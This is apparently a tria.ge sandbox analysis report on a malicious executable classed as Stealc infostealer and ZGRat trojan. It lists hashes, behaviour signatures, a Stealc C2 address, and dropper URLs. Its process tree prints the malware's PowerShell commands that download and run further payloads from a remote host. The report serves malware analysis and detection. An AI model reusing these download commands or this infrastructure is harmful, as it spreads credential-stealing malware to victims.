Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

file.exe

windows7-x64

10

file.exe

windows10-2004-x64

10

$PLUGINSDIR/INetC.dll

windows7-x64

3

$PLUGINSDIR/INetC.dll

windows10-2004-x64

3

Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09/05/2024, 15:43

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    file.exe

  • Size

    49KB

  • MD5

    213c0265511727869c959abd24ea3677

  • SHA1

    22ea6fe23eeb57d0048d1b0e2a826dd66c6969d9

  • SHA256

    3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7

  • SHA512

    bfa4d229ade2e47d91f3fb761e68f727aab86980a2697cb06955324e9b61b384569a285edfaa1d1dd7aea95e24d171a770a4f573a19ec795325c68250720f41e

  • SSDEEP

    1536:XferrLkSRoe8C4UZsys0Dh1duFpxFI+PlZ:Xfi3k+oWDBDh1duFpkWlZ

Score
10/10
stealczgratdiscoveryexecutionratstealer

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://d2iv78ooxaijb6.cloudfront.net/load/th.php?a=2836&c=1000

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=425&c=1000

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=444&c=1000

Extracted

Family

stealc

C2

http://185.172.128.150

Attributes
  • url_path

    /c698e1bc8a2f5e6d.php

Signatures

  • Detect ZGRat V1 3 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

    stealerstealc
  • ZGRat

    ZGRat is remote access trojan written in C#.

    ratzgrat
  • Blocklisted process makes network request 5 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 34 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 7 IoCs
  • Suspicious use of SendNotifyMessage 7 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:3252
    • C:\Windows\SysWOW64\cmd.exe
      "cmd" /c "C:\Users\Admin\AppData\Local\Temp\nsu4641.tmp\est.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1448
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/th.php?a=2836&c=1000','stat')"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1032
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=425&c=1000','i1.exe')"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1372
      • C:\Users\Admin\AppData\Local\Temp\i1.exe
        i1.exe /SUB=2838 /str=one
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:2340
        • C:\Users\Admin\AppData\Local\Temp\u1t0.0.exe
          "C:\Users\Admin\AppData\Local\Temp\u1t0.0.exe"
          4⤵
          • Executes dropped EXE
          • Checks processor information in registry
          • Suspicious behavior: EnumeratesProcesses
          PID:4592
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 760
            5⤵
            • Program crash
            PID:224
        • C:\Users\Admin\AppData\Local\Temp\u1t0.1.exe
          "C:\Users\Admin\AppData\Local\Temp\u1t0.1.exe"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Checks SCSI registry key(s)
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of WriteProcessMemory
          PID:4948
          • C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
            "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2704
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2340 -s 1168
          4⤵
          • Program crash
          PID:2420
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=444&c=1000', 'i2.bat')"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3712
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2340 -ip 2340
    1⤵
      PID:4712
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4592 -ip 4592
      1⤵
        PID:5076

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
        Filesize

        1KB

        MD5

        4280e36a29fa31c01e4d8b2ba726a0d8

        SHA1

        c485c2c9ce0a99747b18d899b71dfa9a64dabe32

        SHA256

        e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359

        SHA512

        494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        16KB

        MD5

        e90c7b6f1a3a3e7e842e64a2a8c0e969

        SHA1

        e647a208640f0fe22792de1e7723f104d5f4faa2

        SHA256

        7f34313da74439cbca35c09b8d5751b320cacb1ddb7fa370888845a9c9f580af

        SHA512

        9050141fe519d592cd4ec6f387af4957c81bf2c0ebe9b0836a4df25226767c042d7e473b13517b27ce9563dcc88112c3bc38d91fb87dadec6d7cde40e5433702

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        16KB

        MD5

        a9afbc6fbc7d08a0f7669c5a305ab092

        SHA1

        74e9fff6190730e0a13296ba154b1f8347d6cddc

        SHA256

        e29459807a93be49cdbf7c7ec6bf5a59757524699b0300cedbffad1416b4e199

        SHA512

        5359f3d13e9aadf841ec7de20ad547609ae20984c4125c8a98f116f9d2c46d4e95142f83515839ffd5482f186dad672fcbfdea13b3eee474b5d148014dc801bf

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qgapsgdb.voh.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\i1.exe
        Filesize

        382KB

        MD5

        278218d2ac13d2d7134e6e9a0828e4d5

        SHA1

        05066b895c41396d0321bc3a032f2f7c2e1811e3

        SHA256

        c697ba11d34c3fcce2efe3d2699c68c933f986b36ccb6b9fb0e9c08fcbcfa7e0

        SHA512

        f1e41a457c01a6ad0ac00e3a004023429d644b1a9bb193afd277f333f1bd4bd00059e37c6df2565b9c7e8bda3cbe3f713b2d39d04ca0c5ad169788efdb230b7d

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\nsu4641.tmp\INetC.dll
        Filesize

        25KB

        MD5

        40d7eca32b2f4d29db98715dd45bfac5

        SHA1

        124df3f617f562e46095776454e1c0c7bb791cc7

        SHA256

        85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9

        SHA512

        5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\nsu4641.tmp\est.bat
        Filesize

        735B

        MD5

        f32d05160acf8325e9a09f09f80d16f4

        SHA1

        46e159b71e6ef99076c4002e1fda134e1d0a86c9

        SHA256

        da8f4f45b105538f0063ece220b69455b15c8e680099c02221c093ecb794ae37

        SHA512

        147c870edd09fa3f6cd93caae809b5d66fecc759e3cfee4e47dc487786edc760989fdb23310b4284e63871fe1b1d805e949601f54bfc93ff80e2e097a989879b

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\u1t0.0.exe
        Filesize

        218KB

        MD5

        5246be38e251c182f838adf4ef42ad40

        SHA1

        fe09ba5ee40d4c4897c8f8e3fa819c13b0e324d9

        SHA256

        7dbf762b2ef2b651a4e8c7b7d9b8996a1de0cfa44119452f1d3f29bfe03dfd86

        SHA512

        a3f7c75a2355935d19c733d67aeff3e08f382ae60c1ba45364974ff91ca779ac5e49c40475fe35b8923a130e8670de0311fdf3c03de935312869e9a9a8b21b14

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\u1t0.1.exe
        Filesize

        4.6MB

        MD5

        397926927bca55be4a77839b1c44de6e

        SHA1

        e10f3434ef3021c399dbba047832f02b3c898dbd

        SHA256

        4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7

        SHA512

        cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954

        Download Submit

      • memory/1032-39-0x00000000060C0000-0x00000000060DA000-memory.dmp

        Filesize

        104KB

        Download

      • memory/1032-22-0x0000000073C80000-0x0000000074430000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/1032-35-0x00000000055E0000-0x0000000005934000-memory.dmp

        Filesize

        3.3MB

        Download

      • memory/1032-36-0x0000000005BD0000-0x0000000005BEE000-memory.dmp

        Filesize

        120KB

        Download

      • memory/1032-37-0x0000000005C00000-0x0000000005C4C000-memory.dmp

        Filesize

        304KB

        Download

      • memory/1032-25-0x0000000005570000-0x00000000055D6000-memory.dmp

        Filesize

        408KB

        Download

      • memory/1032-38-0x0000000007400000-0x0000000007A7A000-memory.dmp

        Filesize

        6.5MB

        Download

      • memory/1032-42-0x0000000073C80000-0x0000000074430000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/1032-23-0x0000000004D10000-0x0000000004D32000-memory.dmp

        Filesize

        136KB

        Download

      • memory/1032-18-0x0000000073C8E000-0x0000000073C8F000-memory.dmp

        Filesize

        4KB

        Download

      • memory/1032-19-0x0000000002290000-0x00000000022C6000-memory.dmp

        Filesize

        216KB

        Download

      • memory/1032-20-0x0000000004DA0000-0x00000000053C8000-memory.dmp

        Filesize

        6.2MB

        Download

      • memory/1032-21-0x0000000073C80000-0x0000000074430000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/1032-24-0x0000000005500000-0x0000000005566000-memory.dmp

        Filesize

        408KB

        Download

      • memory/1372-60-0x0000000073C80000-0x0000000074430000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/1372-52-0x0000000073C80000-0x0000000074430000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/1372-46-0x0000000005390000-0x00000000056E4000-memory.dmp

        Filesize

        3.3MB

        Download

      • memory/1372-45-0x0000000073C80000-0x0000000074430000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/1372-44-0x0000000073C80000-0x0000000074430000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/2340-92-0x0000000000400000-0x0000000002B1D000-memory.dmp

        Filesize

        39.1MB

        Download

      • memory/2340-107-0x0000000000400000-0x0000000002B1D000-memory.dmp

        Filesize

        39.1MB

        Download

      • memory/2704-151-0x00000222EA100000-0x00000222EA122000-memory.dmp

        Filesize

        136KB

        Download

      • memory/2704-156-0x00000222EA130000-0x00000222EA430000-memory.dmp

        Filesize

        3.0MB

        Download

      • memory/2704-170-0x00000222EF6B0000-0x00000222EF6CE000-memory.dmp

        Filesize

        120KB

        Download

      • memory/2704-169-0x00000222EF750000-0x00000222EF7C6000-memory.dmp

        Filesize

        472KB

        Download

      • memory/2704-168-0x00000222EF370000-0x00000222EF37C000-memory.dmp

        Filesize

        48KB

        Download

      • memory/2704-141-0x00000222CAE40000-0x00000222CE674000-memory.dmp

        Filesize

        56.2MB

        Download

      • memory/2704-142-0x00000222E9D60000-0x00000222E9E6A000-memory.dmp

        Filesize

        1.0MB

        Download

      • memory/2704-144-0x00000222D0520000-0x00000222D052C000-memory.dmp

        Filesize

        48KB

        Download

      • memory/2704-143-0x00000222D0400000-0x00000222D0410000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2704-145-0x00000222D0510000-0x00000222D0524000-memory.dmp

        Filesize

        80KB

        Download

      • memory/2704-146-0x00000222E9BC0000-0x00000222E9BE4000-memory.dmp

        Filesize

        144KB

        Download

      • memory/2704-147-0x00000222D0530000-0x00000222D053A000-memory.dmp

        Filesize

        40KB

        Download

      • memory/2704-148-0x00000222E9BF0000-0x00000222E9C1A000-memory.dmp

        Filesize

        168KB

        Download

      • memory/2704-149-0x00000222E9FB0000-0x00000222EA062000-memory.dmp

        Filesize

        712KB

        Download

      • memory/2704-150-0x00000222EA0B0000-0x00000222EA100000-memory.dmp

        Filesize

        320KB

        Download

      • memory/2704-165-0x00000222EFBB0000-0x00000222F00D8000-memory.dmp

        Filesize

        5.2MB

        Download

      • memory/2704-162-0x00000222EF350000-0x00000222EF35A000-memory.dmp

        Filesize

        40KB

        Download

      • memory/2704-158-0x00000222EEB30000-0x00000222EEB38000-memory.dmp

        Filesize

        32KB

        Download

      • memory/2704-152-0x00000222E9BE0000-0x00000222E9BEA000-memory.dmp

        Filesize

        40KB

        Download

      • memory/2704-160-0x00000222EE480000-0x00000222EE48E000-memory.dmp

        Filesize

        56KB

        Download

      • memory/2704-161-0x00000222EE4A0000-0x00000222EE4A8000-memory.dmp

        Filesize

        32KB

        Download

      • memory/2704-159-0x00000222EE4B0000-0x00000222EE4E8000-memory.dmp

        Filesize

        224KB

        Download

      • memory/2704-164-0x00000222EF660000-0x00000222EF682000-memory.dmp

        Filesize

        136KB

        Download

      • memory/2704-163-0x00000222EF600000-0x00000222EF662000-memory.dmp

        Filesize

        392KB

        Download

      • memory/3712-65-0x00000000061E0000-0x0000000006534000-memory.dmp

        Filesize

        3.3MB

        Download

      • memory/3712-76-0x00000000069F0000-0x0000000006A3C000-memory.dmp

        Filesize

        304KB

        Download

      • memory/4592-128-0x0000000000400000-0x0000000002AF3000-memory.dmp

        Filesize

        38.9MB

        Download

      • memory/4592-173-0x0000000000400000-0x0000000002AF3000-memory.dmp

        Filesize

        38.9MB

        Download

      • memory/4592-175-0x0000000000400000-0x0000000002AF3000-memory.dmp

        Filesize

        38.9MB

        Download

      • memory/4592-178-0x0000000000400000-0x0000000002AF3000-memory.dmp

        Filesize

        38.9MB

        Download

      • memory/4592-180-0x0000000000400000-0x0000000002AF3000-memory.dmp

        Filesize

        38.9MB

        Download

      • memory/4948-140-0x0000000000400000-0x00000000008AD000-memory.dmp

        Filesize

        4.7MB

        Download

      • memory/4948-129-0x0000000000400000-0x00000000008AD000-memory.dmp

        Filesize

        4.7MB

        Download